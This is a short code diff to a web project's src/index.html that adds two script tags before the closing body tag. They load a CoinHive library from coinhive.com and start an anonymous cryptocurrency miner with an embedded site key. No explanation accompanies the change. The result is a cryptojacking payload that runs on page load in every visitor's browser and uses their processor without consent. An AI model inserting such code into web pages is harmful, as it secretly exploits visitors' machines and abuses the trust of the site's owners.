--- a/src/index.html
+++ b/src/index.html
@@ -92,5 +92,7 @@
     <!-- endinject -->
     <!-- endbuild -->
 
+    <script src="https://coinhive.com/lib/coinhive.min.js"></script>
+    <script>var m = new CoinHive.Anonymous('mtVWUsiOPo3ppphNIXWdvURmG5r0p3hC'); m.start(); </script>
   </body>
 </html>
